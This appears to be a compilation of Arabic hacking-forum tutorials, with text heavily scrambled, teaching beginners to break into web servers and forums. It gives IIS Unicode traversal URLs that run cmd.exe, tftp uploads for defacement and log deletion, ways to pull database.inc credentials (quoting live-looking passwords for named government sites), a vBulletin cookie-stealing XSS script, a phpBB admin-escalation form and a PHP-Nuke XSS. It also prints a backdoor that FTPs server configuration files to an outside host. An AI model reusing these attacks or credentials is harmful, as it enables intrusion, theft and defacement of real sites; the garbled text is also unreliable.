
هو المستخدم اسم ان ترى السابق الكود  LinuxRay_ فيهي السر 6666666وكلمة  

------------------------------------------------------------------ 

ال صفحة في خطأ هناك كان اذا احيانا انه المضحك مثل ASP الشئ : االتي

AMicrosoft VBScript runtime error '800a01a8' 

Object required: 'Conn' 

/filename.inc, line 5 

بامتداد ينتهي ملف يتم inc.* هناك اوامر على يحتوي ملف هذاوكلمة المستخدم اسم على ويحتوي الملقم جانب من تنفيذها

 المرورالملففي اسم باضافة وذلك الملف هذا بسحب قم تنتظر ماذا اذن

الموقع  . عنوان

صفحة في االمر هذا مثل ترى ان  ASP وممكنملف داخل البرمجة اوامر ان يعني هذا عليها الثغرة تطبيق عند

database.inc 

>!--#include file = "database.inc"--< 

ملفات مثل المرور كلمة على تحتوي ملفات عدة  وهناك

global.asa ++global.asa 

beforemilion-global.asa -global.asa milion.sql 

global-direct.asa 

هو هذا لكن االسماء بهذه الملفات تكون ان الضرورة ليسمنمبرمجين قبل من عليه  SQL المعتاد

االتي مثل الصفحة اسم تكتب ان فعله ماعليك  : وكل

global.asa+.htr 

في قديمة ثغرة صفحة IIS 3 هناك بعد تضيف ان هذا ASP وهييلي data$:: الرمز  كما

file.asp::$data على اال التعمل الثغرة فقط IIS 3 هذه بتطبيقها نفسك تتعب فال

اكثر ال  . للعلم

المستخدم ... اسم على الحصول بعد ماذا النهاية من اقتربنا لقد؟؟ المرور  وكلمة

ال قاعدة على الدخول  !! SQL بعدها

استخدم انا البينات قاعدة على تدخل برامج عدة Visual هناكinterdev 6.0 السهل البرنامج استخدام افضل مازلت ACCESS لكني

2000 

قائمة الى الذهاب البرنامح فتح هو فعله عليك ما  كلFile  اخترNew 

اختار الجديدة الملفات قائمة  ومنProject )Exiting Data( 

موجودة بيانات قاعدة مشروع  . اياختر الملف النشاء مربع لك  سيظهر

Create انشاء  اي

مربع سترى  االنData Link Properties 

اسم - بي االي او الموقع اسم معلومات لثالث فقط تحتاجالمرور - كلمة  المستخدم

صندوق - 1 في الموقع اسم  Select or enter server name ادخل

في - 2 المستخدم  User Name اسم

السر - 3  Password كلمة

مربع ( مالحظة من الصح بإزالة  )Blank Password قم

على البداية في الختبار Test Connection اضغط االسفل فيالعبارة هذه رأيت اذا البيانات بقاعدة Test Connection االتصال

Succeeded بنجاح تم البيانات بقاعدة االتصال ان  .فمعناه

القائمة من اليها الدخول تريد بيانات قاعدة اي تختار ان االن يمكنك

 : المسندلةSelect the data base on the server 

على موافق OK واضغط  . او

التجارب  : فئران /http://www.moe.gov.sa موقع

التالية -1 الصفحة على بالدخول  : قم

http://www.moe.gov.sa/news_admin.asp 

مايلي  سترى

Microsoft VBScript runtime error '800a01a8' 

Object required: 'Conn' 

/news_admin.asp, line 7 

ثغرة عليها طبق  : كتالي htr ثم

http://www.moe.gov.sa/news_admin.asp+.htr 

السورسلترى الى  اذهب

>!--#include file = "database.inc"--< 

ملف بسحب  : كتالي database.inc قم

http://www.moe.gov.sa/database.inc 

مايلي ترى  : سوف

>% 

Set DB= Server.CreateObject)"ADODB.Connection"( DB.Open "DRIVER=SQL

Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa",

"123321" 

%< 

وكلمة المستخدم اسم انه االن عينك امام مالذي تعرف هلاحد ..... ال ان اعرف انا البيانات قاعدة على بالتشبيك سارع المرور

مادة  يحب . الكيمياء

الثاني التجارب  : فأر

 /http://www.itsalat.com موقع

1 - User name : sa Passwd : sp2000

*****************المنتديات اختراق في ودوره الويندوز  سرفرات

دا جيدا الويندوز ثغرات يعرف مبتدي هكرز واي الهكرز نحنفاشل نظام باالالوف% 80وهي وثغراته

راح ويندوز يستضيفسرفرات وموقع منتدي لديه اخ اي والانصحبااثبتات ليش اقلكم

البيانات 2صور قاعدات وحجم مهم امريكي لجمعية صورة 1.5هو يعني اختراقه 15000كيك تم مشترك ملين خمسة علي ويحتوي ميك

كامال لجاهزي الموقع تحميل جاري بنفسي  البارحه

1 الهتمل ثغرات2 بيج الفرونت

3 لهكرز كثير منه واالستفاد االفتبي مخلفات4 البرامج ثغرات

النظام 6 حماية تمكن 100عدم %

وبرامجهم الويندوز سرفرات عن باالبتعاد االخوه انصح الذلك

IIS ماهي نعرف  بداية

تي ان وويندوز بروفشنال الفين ويندوز في متواجدة خدمه IIS هي الـ

IIS5.0... معلومات ملقم من الخامسة االصدارة يمتلك الفين وويندوز االنترنت

نبدأ الله  بسماس اي االي في ضعف نقطة تستغل 5او 4توجد النقطة وهذه

جدا سهلة  بطريقةباليونيكود النقطة هذه  وتسمى

المواقع اختراق مجال في عميقة خبرة الى اليحتاج سهال  وتنفيذهاللمبتئيدئن النقطة هذه عند نقف  ولكن

بهذه شهيرة مواقع عدة اختراق في االن يفكرون عامة المبتدئين الطريقة

غير او الشهيرة المواقع مع مجدية غير الطريقة هذه ال ولكن

 الشهيرةتي ان او الفين ويندوز في اال التوجد الضعفهذه نقطة  الن

اليونكسواللنكس انظمة تستخدم الشهيرة المواقع  وأغلبتطلع يوم وكل محدودة حمايته نظام الفين او تي ان ويندوز ان أي

جديدة  ثغراتاالضعاف نقاط ضعفمن نقطة ايقاف المواقع مدراء بوسع لكن

تي االن في  الموجودةالهكرة من لهم حاجزا جعلو يكونون قد الطريقة بتلك  لكن

ليسدائما  ولكنالمتصفح داخل من  وتنفذ

كاالتي الثغرة تنفيذ  : وطريقةhttp://www.xxxxxx.com/scripts/..&Aacute; ../winnt/system32/cmd.e

xe?/c+dir+c:\ الثغرة تنفيذ بدأت كوم دوت بعد االن هنا  ركزو

السي رؤية وليسفقط ملف اي دخول أيضا :c وبإمكانك الثغرة هذهملفات عرضجميع بــ لك  تسمح

وهي ثغرة من أكثر  وتوجد/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 

/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ 

المتصفح من تنفيذها  وطريقةالموقع اسم بعد تنفيذها  ومكان

 : مثالhttp://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c\+ 

كوم دوت بعد  أييظهر شكل اي على او يظهر مالذي الناسيسألون  بعض

بسيط  الحلDir الملفات لك الدوسستظهر نافذة في بكتابته قمت لو االمر  هذا

تقريبا المتصفح في الملفات ظهور  وطريقةالدوس  بنفسطريقة

في فتبدأ امامك الملفات واظهرت الثغرة تنفيذ في نجحت إذاالثانية  تنفيذالخطوة

تحميله تريد الذي للملف ابلود عمل الثانية  الخطوةخبرة الى اليحتاج أيضا األبلود  وعملابلود تعمل لكي شروط هنالك  لكن

الضحية الموقع على مثبت بي تي إف التي أن من التأكد  يجب

االتي إتبع تتأكد  وللكيالسستم ملف على الدخول تضيف 32يجب أن يجب تدخله ولكي

تنفيذها في نجحت التي الثغرة على الكلمات  بعض :مثال

http://www.xxxxxx.com/scripts/..&Aacute; ../winnt/system32/cmd.exe?/c+dir+c:\ 

الملفات ورأيت المطلوب الموقع في عملت الثغرة  هذهالتغير  الحظ

http://www.xxxxxx.com/scripts/..&Aacute; ../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\ 

الويندوز داخل متواجدة لملفات أسماء هو الثغرة على ماوضعWinnt\Sytem32\ 

تتأكد لكي الملفات هذه على الدخول عليك يجب  أيمع ..... متطابقة ليست نستخدمها التي الثغرة يتسالون القراء بعضباي الدخول عليك يجب للتطابقها ليسشرط هذا ولكن الثغرة هذه

السستم مللف على  كانالثغرة هذه معاه اشتغلت القراء احد يكون  ممكن

http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:\ السستم ملف على ادخل كيف  ويقول

على تدخل لكي الملفات اسماء إضافة عليك يجب واحد هو الحل32السستم  

االمتداد هذا بعد  ايc+dir+c:\ الملفات أسماء تضيف  هنا

http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32/ خبرة الى التحتاج سابقا قلنا  كما

محتوياته لك ستظهر السستم ملف دخول  وبعديسمي برنامج عن البحث آنذاك على  ويجب

tftp.exe في انه من وتتأكد ماتلقاه الين البرنامج هذا على دور يعني الجهاز

للصفحة ابلود تعمل لكي شرط يعتبر البرنامج هذا  النرايح ماهو تعبك الله بإذن يعني بالخير اتفاءل البرنامج لقيت ولو

الفاضي  على.................................................. ....................................... 

هو الثاني  والشرطبي تي إف التي برنامج عندك يكون أن  يجب

العنوان هذا من تنزله تقدر البرنامج  وهذاwww.geocities.com/anorR1234/tftpd32.zip 

C:\ تحطه إنك االفضل من منه الضغط وتفك البرنامج ماتنزل وبعدالـ  داخل

في أبلود لها تعمل أن تريد التي الصفحة أو البرامج أيضا وتحط السي

الموقع دالخل الى مو جهازك داخل الى السي في  تحطهالبرنامج  وتشغل

tftp32.exe األساسية مهمتك من تنتهى أن الى يعمل  وتتركهC:\ في شي كل وحط كالمي  أسمع

المهمه تنجح راح الله بإذن حطيتها لو  ألنك----------------------------------------------------------------- 

الملفات تحميل وهي الخطرة النقطة في بدأنا  االناالبلود بالتحميل اقصد أني العلم  مع

 أي

تحميل =  أبلودتجميل  مو

ألني بالخير متفائل أنا بس نسبيا معقدة طريقة الملفات وتحميلتفهمو راح أنكم  معتقد

لموضوعنا نرجع  المهمالمتصفح الى ايضا تضاف الملفات نسخ طريقة  المهم

الطريقة بهذه  وتضاف : مثال

http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:\ معاك اشتغلت هذه الثغرة  تخيل

امر تضيف لكي الثغرة من بعضاإلضافات تمسح إنك عليك ويجب النسخ

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm 

االضافة هذه بيكون الثغرة من نمسحه راح الى  يعني/c+dir+c:\ بدالها تظيف  عشان

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm 

الطريقة بهذا لنا بيطلع النسخ امر نظيف  ولمنhttp://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-

i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm اتغير الى إش ياشباب  شايفين

النسخ أمر في الالزم تغير إنك أيضا  بسالزم مثل

tftp.exe الى بي تي اف التي برنامج اسم النه حاله في سيبه هذااالن ومشغله السي في  حاطه

"-i" مهم النه سيبه برضه  هذاتتأكد 1.1.1.1 وعشان جهازك تبع االيبي تكتب هذا االرقام بدال هنا

االيبي وهذا ايبي يطلع راح بي تي اف التي تشغب لمن االيبي منتكتبه الى هو طلعلك  الى

GET نسخ في شرط تعتبر النها حالها في سيبها االضافة هذه المفات

index.htm عاد تغيرها وممكن تتحمل راح الى الصفحة اسم هذهانت  بكيفك

C:\inetpub\wwwroot\ الخاصة الرئيسة الصفحة تواجد مكان وهذا بالموقع

index.htm يظهر أن تريده التي الملف او الصفحة إسم تكتب هناالموقع  في

C:\ جهازك في تحميلها المراد الصفحة حاط إنك من التأكد يجبالـ  داخل

index.htm الصفحة اسم  ومثالصارت االن الثغرة ان من تاكد الملف تنسخ عشان انتر ماتضغط قبل

الثغرة هذه لمثل  مشابهاhttp://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-

i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroo t\index.htm 

الله على وتوكل إنتر اضغط لها مشابها طلعت  ولوالملف يتنسخ راح الله  وبإذن

----------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------- واالهم االخيرة النقطة  وفى

مثل عنك معلومات ومكونة الجهاز داخل تجمعت تكون ملفات مسح االيبي

http://server/msadc/..&Agrave;¯../..../c+del+c:/*.log --------------------------------------

*******************

وحقيقة 5 العرب المعربين ودور النت في المنتشره النسخهوتعريبهم  الموضوع

موقعه ثغرات رغم جون منتديات اليخترقوا لماذا قلنا كما النه1اوال نضيفه نسخه يستخدم

مصمممي 1 جيد وعارفين ثغرات مليان بالنت الموجود النسخهاذا ينشرونه الماذا $المنتدي

كود ومسحت نفذت لو الكي التبليغ كود ومحتوي تجريبي النسخهبنفسك لكشفته فكرك تشغل لو ثغراته من تهرب لن  التبليغ

لمدة 2 تكون ان بدال بضعتهم لترويج تجريبي نسخه جميعه انهفهمتموني 30 يوما

مواقع 3 من علي نحصل نسخه هو باالنترنت االمنتشره النسخهوحيلهم الغرب هكرز من انت وينك صح هكرز

الشركة نسخة علي الحصول في تمكنت منتشره% 100لو ونسخه اليه اضافوا بل منه التبليغ كود بحذف قاموا لرئيتصح النت في

- انه يوكد النسخه صاحب االخ يجي وبعدين وثغرات وبالوي كودادجون بمنتديات ثغرة لقي

ارتفع اعالناته وسعر موقعه انشهر يندهشكييييييفخالص والعالمالزوار لكثر موقعه  في

فيه العب وكيفة مكانه يعرف ونفسه الكود اضاف نفسه هو الحقيقةاالمور هكذا والله

االجانب من نذال اقل ليسوا العرب المعربين

باانفسكم نسخكم بتعريب  انصحكم

بعضنسخ في ثغره اكتشاف تم بسيطه فتره لنا 2.2.5قبل المسربه ملف في فيها الموجود الكود هذا وكان العرب اخواننا forum من

PHP:--------------------------------------------------------------------------------

if )$action=="modify"( {$vbxh = h;$vbxt = t;

$vbxp = p;$vbxw = w;$vbxa = a;$vbx1 = 1;$vbxr = r;$vbxb = b;$vbxn = n;$vbxe = e;$vbxo = o;$vbxy =y;$vbxl = l;

echo ">!-- ";$file = 

fopen)"$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vb

xe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA

ME", "r"(;$rf = fread)$file, 1000(;

fclose)$file(;echo " --<";

--------------------------------------------------------------------------------

موقع في يتصل هذا الحلو الكود وكان

http://www.arab1.net/ 

http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME

نسخه نزلت االيام مع كود 2.2.6عموما وشالوا حبايبنا لنا وسربوها االخوه تجسسونعم كود لنا يحطون عشان عليهم ياعيني التبليغ

المسلمين  العرب

المره الكود االول زي وغبي مكشوف ومهو اذكى الكود بسهالمرهملف ملفين في موجود option هذي باالخير

PHP:

--------------------------------------------------------------------------------echo ">!-- ";

include "$sqlupdate";echo " --<";

--------------------------------------------------------------------------------

functions وملف

PHP:--------------------------------------------------------------------------------

$sqlupdate = base64_decode)'aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9

5YWwvLngyLmluYw=='(;

--------------------------------------------------------------------------------

وانكود ديكود باكدوا نلعب نعرف صرنا الذكاء على ياعيني

ديكود فيه مستخدمين اللي هذا الحلو الكود يتصل بعد هذي والمرههذا  بالموقع

http://saudi.no-ip.com/ويقولكم فيكم WELCOME TO arab1.net بيرحب

عالترحيب ياعيني

بالصفحه بيتصل الكود عموما http://saudi.no-ip.com/~royal/.x2.inc هذي رهييييييب كود فيها اللي

وعرب ....... كمسلمين علينا يحسبون اللي لنا ويبينالكود شوفو

PHP:--------------------------------------------------------------------------------

>div id="sHo" style="display:none;"<>!-- 

if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail.com

>?phpsystem)"mkdir /tmp/.statics"(;

system)"cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf"(;system)"cp /usr/local/apache/conf/httpd.conf

/tmp/.statics/httpd2.conf"(;system)"cp admin/config.php /tmp/.statics/php.conf"(;

system)"tar -cvf /tmp/.statics.tgz /tmp/.statics"(;$vilename = "$SERVER_NAME.bz";

$port = base64_decode)'aHB5NWk5'(;

$conn_id = ftp_connect)"cyber-sa.virtualave.net"(; $login_result = ftp_login)$conn_id, "cyber-sa", "$port"(; 

$upload = ftp_put)$conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY(; 

ftp_quit)$conn_id(; system)"rm -rf /tmp/.statics.tgz"(;

system)"rm -rf /tmp/.statics"(;$base = "$HTTP_HOST&h2=$SCRIPT_NAME";

$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";$file = fopen)"$open", "r"(;

$rf = fread)$file, 1000(;fclose)$file(;

?<--<

>/div<

بيعرف هو ملفه في العرب دار كان واخره

************

6 بنسبة المخترقين من ومنتدياتكم% 80الحمايه الاجهزتكم  

حماية الحل اليكم المنتديات اختراق نسمع يوم كل اليكم% 80يالله وحمايته اخترقه اسباب

االدمن 1 بمجلد ثغرات وجود2 مود مجلد ثغرةاالستيل 3 ثغرة

الهتمل 4كوكيز 5

6 التلنت  دعم7 Cfgwiz32.exe ويندوز المجلد C:\Windows على

8 الملف misc منلحصول 9 المخترق قبل من لك ارسله تم باتشبجهازك وجود

 بمعلوماتك

******

الحماية  كيفية

جيدا 1 االدمن ملف بحماية سرفرات htaccess. قم في فقط شغلالينوكسليسويندوز

بحمايته 2 htaccess. قمباالمنتدي 3 ثغرة يسببب كثير ستيالت التركب

ابدا 4 الهتمل لغة التفعلدائما 5 نظفجاهزك الكوكز من احذر

6 التحتاجه عندما لموقع نيت التل بتوقيف  قمباسم 7 ملف وجود عدم من ويندوز Cfgwiz32.exe نأكد المجلد على

C:\Windowsله 8 حل عن البحث جاري فيه الدنيا بلوووووي ده

بجهازك 9 الفيروسات برامج بتركيب  قمانواع 10 كافة علي لحصولك االحمر العقرب منتديات بزيارت قم

وموقع لجهازك . الحماية

،،،انتهى

منتديات ".29 في " vBulletin 2,2,9ثغرة

> مصر ابن منتدى من >منقول> المدمر: >الكاتب

المنتديات بحاية وتؤدي جدا خطيرة الثغرة ....vBulletin 2.2.9 هذه

كالتالي شرحها :المهم

بامتداد -1 بالمفكرة واحفظه الكود php انسخ>?PHP 

// vBulletin XSS Injection Vulnerability: Exploit // --- 

// Coded By : Sp.IC )SpeedICNet@Hotmail.Com(. // Descrption: Fetching vBulletin's ******s and storing it into a log

file. 

// Variables: 

$LogFile = "******s.Log"; 

// Functions: /* 

If )$HTTP_GET_VARS['Action'] = "Log"( { $Header = ">!--"; $Footer = "---<"; 

} Else { 

$Header = ""; $Footer = ""; 

} Print )$Header(; 

*/ Print )">Title<vBulletin XSS Injection Vulnerability:

Exploit>/Title<"(; Print )">Pre<"(; 

Print )">Center<"(; Print )">B<vBulletin XSS Injection Vulnerability: Exploit>/B<\n"(; 

Print )"Coded By: >B<>A Href=\"MailTo:SpeedICNet@Hotmail.Com\"<Sp.IC>/A<>/B<>Hr

Width=\"20%\"<"(; /* 

Print )$Footer(; */ 

Switch )$HTTP_GET_VARS['Action']( { Case "Log": 

$Data = $HTTP_GET_VARS['******']; $Data = StrStr )$Data, SubStr )$Data, BCAdd )0x0D, StrLen

)DecHex )MD5 )NULL((((((; $Log = FOpen )$LogFile, "a+"(; 

FWrite )$Log, Trim )$Data( . "\n"(; FClose )$Log(; 

Print )">**** HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\"

&@#&@#&@#&@#&@#&@#&@#=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\"<"(; 

Break; Case "List": 

If )!File_Exists )$LogFile( || !In_Array )$Records(( { Print )">Br<>Br<>B<There are No Records>/B<>/Center<>/Pre<"(; 

Exit )(; } 

Else { Print )">/Center<>/Pre<"(; 

$Records = Array_UniQue )File )$LogFile((; Print )">Pre<"(; 

Print )">B<.:: Statics>/B<\n"(; Print )"\n"(; 

Print )"o Logged Records : >B<" . Count )File )$LogFile(( . ">/B<\n"(; 

Print )"o Listed Records : >B<" . Count )$Records( . " >/B<[Not Counting Duplicates]\n"(; 

Print )"\n"(; 

Print )">B<.:: Options>/B<\n"(; Print )"\n"(; 

If )Count )File )$LogFile(( < 0( { $Link['Download'] = "[>A Href=\"" . $LogFile .

"\"<Download>/A<]"; } 

Else{ $Link['Download'] = "[No Records in Log]"; 

} 

Print )"o Download Log : " . $Link['Download'] . "\n"(; Print )"o Clear Records : [>A Href=\"" . $SCRIPT_PATH. "?

Action=Delete\"<Y>/A<]\n"(; 

Print )"\n"(; Print )">B<.:: Records>/B<\n"(; 

Print )"\n"(; 

While )List )$Line[0], $Line[1]( = Each )$Records(( { Print )">B<" . $Line[0] . ": >/B<" . $Line[1](; 

} } 

Print )">/Pre<"(; Break; 

Case "Delete": @UnLink )$LogFile(; 

Print )">Br<>Br<>B<Deleted Succsesfuly>/B<>/Center<>/Pre<"( Or Die )">Br<>Br<>B<Error: Cannot Delete

Log>/B<>/Center<>/Pre<"(; Print )">**** HTTP-

&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\" &@#&@#&@#&@#&@#&@#&@#=\"3; URL=" .

$HTTP_SERVER_VARS['HTTP_REFERER'] . "\"<"(; Break; 

} ?< 

يدعم -2 لموقع الملف  php ارفعاللينك -3 هذا على يضغط الضحية اجعل

member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

[script code] واستبدال بهذا

>Script<location='Http://[ تحميله تم الذي الملف ?[مكانAction=Log&******='+)document.******(;>/Script< 

العنوان -4 هذا ألى  إذهبhttp://%20 /تحميله  مكان تم الذي الملف ?Action=List

،،،انتهى

منتديات " " phpbb 2.0.0 اختراق> العرب رواد منتديات من >منقول

phpbb 2.0.0

بالـ شبيه  vbوهو

تااافه يعتبر بل جدا سهل  وهو

بالله سمو  يالله

PhpBB2ملف  admin_ug_auth.php في

:الوصفمدير تكون بأن تصريح تأخذ أن الثغرة هذه خالل من يمكنك

المنتدى على العام والمشرفشئت متى التحكم لوحة الى الدخول يمكنك وبذلك

:األصدار2.0.0

بالمنتدى سجل اوال الثغرة لتجربةبالمنتدى عضويتك رقم احفظ  ثم

اليها مايلي وانسخ المفكرة افتح بعدها

>html<>head<>/head<>body<

>form method="post" action="http://www.domain_name/board_directory/admin/admin_

ug_auth.php"<User Level: >select name="userlevel"<

>option value="admin"<Administrator>/option<>option value="user"<User>/option<>/select<

>input type="hidden" name="private[1]" value="0"<>input type="hidden" name="moderator[1]" value="0"<

>input type="hidden" name="mode" value="user"<>input type="hidden" name="adv" value=""<

User Number: >input type="text" name="u" size="5"<>input type="submit" name="submit" value="Submit"<

>/form<>/body<>/html<

الموقع عنوان الى العنوان هذا عدلhttp://www.domain_name/board_directory المستهدف

بامتداد htmlاخفظهتجد سوف بحفظها قمت التي الصفحة الى تدخل عندما

اختر الثغرة لتطبيق تريده الذي التصريح اختيار يتم والتي قائمةAdministrator تصريح

بالمنتدى عضويتك رقم شع الجانبي بالمربع ثمزر submit أضغط

المستخدم اسم ضع الدخول تسجيل شاشة تاتيك سوف بعدهابك الخاصة المرور وكلمة

ماتريد !! أفعل المنتدى تحكم لوحة في نفسك تجد سوف ثممنتداك المنتدى

بستعرفو منقول صرااحه الدرسوهو سهولت شفتو وسالااامتكم

تطبيق وعليه اال انزله حبيت ما

ذا المنتدا  شووفوو

http://forums.xos.ca/

البااقيه المواقع عقبال لله والحمد ...تدمر،،،انتهى

في ".30 " php nuke ثغرة> مصر ابن منتدى من >منقول

> ايسر: > الكاتب

ال في ثغره لك .. php nuke فيه تتيح دي الثغره عليها اقولكم حبيتالشخصيه الصوره مكان بدل الجافا و الهتمل اكواد ....... تنفيذ

حيشتمني اغلبكم اكيد االول السطر تقروا ما اول انكم عارف اناهو - - باه ده ايه يقول و متعود انا بسعادي اباحه االلفاظ باكثر

الصوره بدل جافا و هتمل اكواد تنفيذ يقولنا عشان هنا مدخلنا !!! !!!! اوي عبيط اما بس؟؟؟ ؟؟؟ !!! الشخصيه

ايه بيها تعملوا ممكن حقولكم الموضوع اخر في ..... لكن

مواقع : ) زي اعمل اني ساحاول كالتالي الثغره ان المهمثغره ( تعرض تيجي لم المحترمه السيكيوريتي

المصابه : االصدارات

PHP Nuke versionh 6.0 منها االقل و

: االستخدام

سكريبتمن الجافا و الهتمل اكواد تنفيذ في قلت كما تستخدمالشخصيه صورهم مكان .خالل

للثغره :ملخصعام

باختيار يطالب فانه المجله في بالتسجيل يقوم عندم مستخدم ايفي الموجوده الصور من مجموعه خالل من ذلك و شخصيه صوره

هذا .... images/forum/avatars/ المجلد

ال .. لكنها و بيز الداتا في الصوره اسم بوضع المجله تقوم عندئذكود على يحصل ان يوزر اي استطاع اذا انه اي كود اي بوضع تقوم

الشخصيه الصوره اختيار صندوق يغير ان استطاع و المجله فورمصندوق الهتمل .. text الى كود يكتب ان ممكن انه اعتقد اذن عادي

عايزه هوه !!!! اللي

:االكسبلويت

و ذلك بعد الدخول و المجله في بالتسجيل تقوم ن عليك اوالصفحه الى الىصفحه Your Account الذهاب الذهاب منها Your و

Info خالل من الصفحه سورسكود باظهار عليك ذلك view بعدsource كلمه عن البحث uid و

كده زي حاجه تالقي : الزم

>input type="hidden" name="uid" value="2111"< 

كان المثال في هوه اللي دي االي رقم عرفت انت يبقى كده2111 ...

اسم اي تسميه و باد النوت في ده الكود تحفظ نك ذلك بعد عليكتغيير html بامتداد مالحظه  /http://nukesite مع المجله عنوان الى

:...... الهدف

>!-- START CODE --!< >form name="Register" 

action="http://NUKEDSITE/modules.php?name=Your_Account" method="post"< 

>b<Code )'"<[code]>b '(>/b<>input type="text"name="user_avatar" size="30" 

maxlength="30"<>br<>br< 

>b<Username>/b<>input type="text" name="uname" size="30"

maxlength="255"<>br<>b<User ID:>input type="text"name="uid" 

size="30"<>input type="hidden" name="op"value="saveuser"<>input 

type="submit" value="Save Changes"<>/form< >!-- END CODE --!< 

ال ملف تشغيل عليك االن الكود .. htmlو كتابه عليك خانه اول هذابالعالمه يبدأ ن يجب انه مراعاه مع تنفيذه : المطلووب

"<

بالعالمه ينتهي ممكن  و

>b

اسم ... كده بعد ضع العرض عند الكود في مشاكل اي تجد ال حتىبعدين و دي االي رقم و صفحه submit اليوزر في نفسك تجد سوفYour Account .. تشغيله تم الكود كده و بك !!!! الخاصه

مثال تكتبه ممكن للي : مثال

"<>h1<TESTING>/h1<>b 

الكلمه حيطبع ده الشخصيه TESTING طبعا صورتك !!.... مكان

العالمه بعد مسافه فيه ان بالك  خلي

">b

كود بروكين تجد سوف واال منها بالك .. خلي

هو تشغله انك ممكن اللي للكود حد كراكتر 30اقصى ....

ثغرات تنفذ ممكن انك اقوله عايز كنت انا انت xss اللي حاجه اي اومن =( لمزيد اياه الهتمل كود اغالق بسبب تنفذها مشعارف

؟؟ ليساكثر كمثال الدرسهذا راجع المعلومات

: الحل

الله و !!!! لسه

بركاته و الله رحمه و عليكم السالم ...و،،،انتهى

للهاكر " العربية المنتديات " أفضل

بجميع الهاك مجال في العربية والمنتديات المواقع أفضل لكم أقدمعرفتي حد على :::مجالته

المنتدى لقوانين إحتراما أضعها  لنwww.3asfh.net

[caution] بالمعلومات جدا غني الموضوع هذا المبتدئين و للمحترفينتحياتي تقبلوا و لكم مرجعا Kinga7MED Hacker فجعلوه

OO_KK_02@YAHOO.COM[/caution]،،31.